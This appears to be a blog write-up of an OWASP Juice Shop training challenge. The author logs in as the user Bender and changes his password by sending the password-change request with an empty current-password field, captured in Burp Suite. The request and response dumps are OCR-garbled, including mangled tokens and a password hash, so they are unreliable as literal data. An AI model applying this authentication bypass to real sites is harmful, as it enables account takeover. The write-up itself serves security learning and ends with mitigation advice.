Information Security

Hacking OWASP’s Juice Shop Pt. 59: Change Bender’s Password

Posted on by codeblue04

Challenge: 

Name: Change Bender’s Password

Description: Change Bender’s password into slurmCl4ssic without using SQL Injection or Forgot Password.

Difficulty: 5 star

Category: Broken Authentication

Expanded Description: https://pwning.owasp-juice.shop/part2/broken-authentication.html

Tools used:

Burp Suite, FoxyProxy

Resources used:

None.

Methodology: 

With the expanded description being of very little obvious assistance, I opted to learn how the password changing mechanism worked using an account for which I already had the password.

Request Params Pretty Headers Actions ISON web Tokens ET / rest/ user/ Host: local host 3000 User-Agent: MoziIIa/S.O (X 11; Linux x86 64; rv. 78.0) Gecko,'20100101 Firefox,'78.o application/ j son, text/ plain, 4 Accept

I was a little surprised to see that the passwords were being passed in cleartext like this, but it being Juice Shop that wasn’t exactly shocking. Now that I knew roughly how the mechanism worked, I logged in as Bender using the SQL injection trick from the Login Bender challenge and started probing. I could have done this with the admin account, but on the off chance I got lucky on my first couple of attempts I didn’t want to waste that luck on the wrong account. After all, knowing that SQL injection was disallowed for this challenge, there were only a few possible weaknesses to test.

Dashboard Send Request Target Cancel Intruder ISON web Tokens Sequencer Decoder Comparer Extender Project options Params Headers •Actions ET / rest/ user/ HIT P/ 1.1 Host: local host 3000 User-Agent: MoziIIa/S.O (X 11; Linux x86 64; rv. 78.0) Gecko,'20100101 Firefox,'78.o application/ j son, text/ plain, l/ * 4 Accept S Accept -Language: en-LlS, Accept -Encoding: gzip, deflate Authorization: Bearer
Dashboard Send Request Target Cancel Intruder _8epeater Sequencer Decoder Comparer Extender Project options User options "SON web Tokens w Params Pretty Headers Actions v ISON web Tokens Response Headers Raw Render Pretty Logger++ _Actions ET / rest/ user/ Host: local host 3000 User-Agent: MoziIIa/S.O (X 11; Linux x86 64; rv. 78.0) Gecko,'20100101 application/ j son, text/ plain, 4 Accept S Accept -Language: en-lJS, Accept -Encoding: gzip, deflate Authorization: Bearer Hl¯r p / 1 Fi refox,'78.o ey ey oiJzdRNj ZXNz1iwi dXN1 cm shbnuio iliLCJ1 b"FpbC161mJ1 b m RI c k aqd'A1 j ZS1zacsvcC1s1nahc3N3b3Jk1j oiTZkN2EOZmNhNzQOMmRkYTNhZDkzYz1 h Nz12hrrk 3ZTQiLCJyb2x1 Ij oiysvzdG9t bi161i1s1mxhc3Rmb2dpbk1w1j oidnskz,Nzpbmvk1iwicHJvzm1 ultywdl Ij zxQi oiliLCJpc0Fj d Gl 2ZS16dHJ1 Z9wiY3J1 YXRI ZEF01j oi Mj Ay McoxMi OwosAxNDo ONDoxNy Awoj Awl iwi dxakYXR1 ZEF01j oi Mj Ay McoxM 1 OwOSAx YgKz Awoj Awliwi ZGVsZXR1 ZEF01j f 9wi a',NF01j ox Nj e HAi oj E2MDc1 zWN9. JhNi t2M0eMrYQaT p2ssmKSEK10rsSJhJarZkRDMpRtmUAAK8Lj 9q10iQopvsp4N1sEnwoaLpzveufifR7dKcHx2Svn IUgZod1VqNH98gx qAcfLheH7aUN1v9xQZLIQuH800rRSEQozJnsi1Afhzk1j k6RG9MT80q] e,NN20ZE 10 Il 13 H-rrp/l.1 401 unauthorized Access-Cont rol -Allow-Origin: 1 X-Content -Type-options: nosniff SAMEORIGIN Feature-policy: payment self' Content -Type: text 'html; charset=utf- Content -Length: a-rag: A,' '20-6tKKLCLLgonzR5q1nvJyo/E13vg Vary: Accept -Encoding Date: Red, 09 Dec 2020 18 11 32 GI•TT Connection: close password is not correct

OK, so using the wrong current password yields a 401 response code. What about leaving the current password field empty?

Send Request Params Pretty Headers 'Actions "SON web Tokens \n Response Headers Render' Pretty Raw 200 0K Actions v ET / rest/ user/ HIT P/ Host: local host 3000 User-Agent: MoziIIa/S.O (X 11; Linux x86 64; rv. 78.0) Gecko,'20100101 Firefox,'78.o application/ j son, text/ plain, 4 Accept S Accept -Language: en-lJS, Accept -Encoding: gzip, deflate Authorization: Bearer ey ey oiJzdRNj ZXNz1iwi dXN1 cm shbnuio iliLCJ1 b"FpbC161mJ1 b m RI c k aqdh'l j ZS1zacsvcC1s1nahc3Nsb3Jk1j oiWZkN2EOZmNhNzQOMmRkYTNhZDkzYz1 hNz12NTk 3ZTQiLCJyb2x1 Ij oiysvzdG9t bi161i1s1mxhc3Rmb2dpbk1w1j oidnskznzpbmvk1iwicHJvzm1 ultywdl Ij oiYXNzZXRzL381YmxpYy9pbRFnZXMv zxQi oiliLCJpc0Fj d Gl 2ZS16dHJ1 Z9wiY3J1 YXRI ZEF01j oi Mj Ay McoxMi OwosAxNDo ONDoxNy 4zwcgKz Awoj Awl iwi dxakYXR1 ZEF01j oi Mj Ay MCOxM 1 OwOSAx YgKz Awoj Awliwi ZGVsZXR1 ZEF01j f 9wi ah'F01j ox Nj e HAi oj E2MDc1 zWN9. JhNi t2M0eMrYQaT p2ssmKSEK10rsSJhJarZkRDMpRtmUAAK8Lj 9q10iQopvsp4N1sEnwoaLpzveufifR7dKcHx2Svn IUgZod1VqNH98gx qAcfLheH7aUN1v9xQZLIQuH800rRSEQozJnsi1Afhzk1j k6RG9W80qj e,NN20ZE Connection: close Referer: http://localhost : 3000/ 10 Cookie: language=en; welcomebanner status=dismiss; cookieconsent status=dismiss, continueCode= IxuYhKt 31KT1 RlbTacmF1iqfPSPHeurtt 8cj s J FaiRfvsaunyuNNh88twYcDR1zbCZNig8fwvS7vuvauDxhvot 8Y1wXTxpsaj UQEHkEhK81Lxc,NSsQSFzMf 8Ksv8UVYH87t La f kaszYHpx, Yr3FVXdVyJAgusmfAAA E; token= ey ey oiJzd',NNj ZXNz1iwi dXN1 cm shbnuio iliLCJ1 bh'FpbC161mJ1 b m RI c k aqd',xl j ZS1zacsvcC1s1nahc3Nsb3Jk1j oiWZkN2EOZmNhNzQOMmRkYTNhZDkzYz1 hNz12NTk SZTQiLCJyb2x1 Ij oiysvzdG9t bi161i1s1mxhcSRMb2dpbk1w1j Lilt Y'Ad1 Ij zxQi oiliLCJpc0Fj d Gl 2ZS16dHJ1 zswiys-n YXRI ZEF01j oi Mj Ay McoxMi OwosAxNDo ONDoxNy 4zwcgKz Awoj Awliwi dxakYXR1 ZEF01j oi Mj Ay McoxM i OwosAx0DowNDoxNC44Mj YgKz Awoj Awliwi ZGVsZXR1 ZEF01j a',NF01j ox Nj A3NTMSMzUzLCJ1 e HAi oj E2MDc1 zNTN9. JhNi t2M0eMrYQaT p2ssmKSEK10rsSJhJarZkRDMpRtmUAAK8Lj 9q10iQopvsp4N1sEnwoaLpzveufifR7dKcHx2Svn 10 13 Access-Cont rol -Allow-origin: T X-Content -Type-options: nosniff SAMEORIGIN Feature-policy: payment self' Content -Type: application/ j son; charset=utf-8 Content -Length: 352 a-rag: n,' 160-h4hnSKx7cdaocs8+fswdhnapTV1" Vary: Accept -Encoding Date: Red, 09 Dec 2020 18:12 Connection: close 'username email " "bender@juice-sh.op , password '06bocsc1922ed4ed62aS449dd209c96d' , 'role 'customer' , 'del uxeToken "lastLoginIp" "undefined' , profilelmage assets/ public/ images/ uploads/ default "totpSecret' "isActive" :true, svg , createdAt " 'updatedAt " 'deletedAt' '2020-12- 09T14: 44: 17. 317Z" , '2020-12- 09T18: 12: 11 824Z" , :null

Success!

You successfully solved a challenge: Change Bender's Password (Change Bender's password into slurmC14ssic without using SQL Injection or Forgot Password.) x

Prevention and Mitigation Strategies:

Don’t transmit passwords in cleartext! Require authentication on the server side to ensure that the current password matches the user-supplied data before updating the password within the user database.

Lessons Learned and Things Worth Mentioning: 

My strategy here was basically to poke the server with a stick until it let me do what I wanted to do. That appears to be a valid strategy!

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s